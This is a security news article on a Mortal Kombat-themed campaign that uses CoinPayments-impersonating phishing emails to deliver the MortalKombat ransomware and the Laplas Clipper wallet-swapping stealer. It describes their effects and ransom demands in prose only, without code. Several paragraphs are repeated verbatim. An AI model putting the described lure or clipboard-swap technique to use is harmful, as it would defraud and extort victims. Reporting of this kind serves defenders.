MortalKombat Ransomware Chains Multi-Stage Attacks To Score A Fatality On Your Data
Mortal Kombat has a reputation for being brutal, but rather than exacting excessive violence on video game characters, unknown threat actors are brazenly brutalizing their victims’ finances in a Mortal Kombat-themed ransomware campaign. Aside from ransomware, this campaign also makes use of the Laplas Clipper malware, which sneakily swaps out cryptocurrency wallet addresses to direct funds to the threat actors.
According to cybersecurity researchers at Cisco’s Talos Intelligence Group, this financially-motivated threat campaign began in December 2022 and is still ongoing. The campaign’s kill chain starts with phishing emails impersonating the legitimate cryptocurrency payment gateway CoinPayments. The emails falsely inform recipients that CoinPayments never received sufficient funds to complete scheduled transactions, prompting recipients to download, extract, and open an attached file presented as an invoice.
The file in question is a batch file that executes a malicious script. The researchers have found two different versions of this batch file: one that downloads and executes the MortalKombat ransomware and one that downloads and executes the Laplas Clipper malware. The latter malware is a clipboard stealer, but, rather than simply exfiltrating everything copied to victims’ clipboards, the malware quietly monitors the clipboards of infected systems for cryptocurrency wallet addresses.
Once Laplas Clipper detects a wallet address in a clipboard, the malware quickly uploads this address to a server controlled by the threat actors and receives back a similar-looking address tied to the attackers’ wallet. The malware then overwrites the original wallet address in the clipboard with the new address. Unsuspecting victims then paste this second address, thinking it to be their own. However, any funds transferred to this address end up in the threat actors’ wallet, rather than the victim’s.
The file in question is a batch file that executes a malicious script. The researchers have found two different versions of this batch file: one that downloads and executes the MortalKombat ransomware and one that downloads and executes the Laplas Clipper malware. The latter malware is a clipboard stealer, but, rather than simply exfiltrating everything copied to victims’ clipboards, the malware quietly monitors the clipboards of infected systems for cryptocurrency wallet addresses.
Once Laplas Clipper detects a wallet address in a clipboard, the malware quickly uploads this address to a server controlled by the threat actors and receives back a similar-looking address tied to the attackers’ wallet. The malware then overwrites the original wallet address in the clipboard with the new address. Unsuspecting victims then paste this second address, thinking it to be their own. However, any funds transferred to this address end up in the threat actors’ wallet, rather than the victim’s.
As for the MortalKombat ransomware, this bit of malware appears to be a new variant of the older Xorist ransomware family. The researchers observed this variant encrypting a wide range of tile types, including some system, application, and backup files. The ransomware doesn’t delete volume shadow copies, but it does corrupt the contents of the recycle bin, empty the startup folder, disable the Windows run command window, and delete the root registry key, rendering all installed applications inoperable.
Once the damage is done, MortalKombat executes its finishing move, which is to replace the desktop background with ransom instructions overlayed on Mortal Kombat 11’s cover art. The ransomware also drops a ransom note text file. Both the desktop background and ransom note instruct victims to download and install the Tor-based qTOX instant messenger to communicate with the threat actors. The ransom note also informs victims how to purchase cryptocurrency for the purpose of paying the ransom fee. So far, it appears that the threat actors behind this campaign are limiting their extortion to the decryption of files stored locally on victims’ machines, rather than attempting to perform double extortion by threatening to publish victims’ files to a dedicated leak site.
Once the damage is done, MortalKombat executes its finishing move, which is to replace the desktop background with ransom instructions overlayed on Mortal Kombat 11’s cover art. The ransomware also drops a ransom note text file. Both the desktop background and ransom note instruct victims to download and install the Tor-based qTOX instant messenger to communicate with the threat actors. The ransom note also informs victims how to purchase cryptocurrency for the purpose of paying the ransom fee. So far, it appears that the threat actors behind this campaign are limiting their extortion to the decryption of files stored locally on victims’ machines, rather than attempting to perform double extortion by threatening to publish victims’ files to a dedicated leak site.
